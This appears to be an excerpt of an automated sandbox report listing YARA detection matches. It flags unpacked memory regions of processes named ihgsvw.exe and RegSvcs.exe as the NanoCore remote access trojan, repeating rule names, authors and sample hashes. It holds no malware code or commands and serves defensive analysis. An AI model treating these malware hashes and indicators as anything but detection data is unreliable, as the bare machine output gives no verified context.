      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
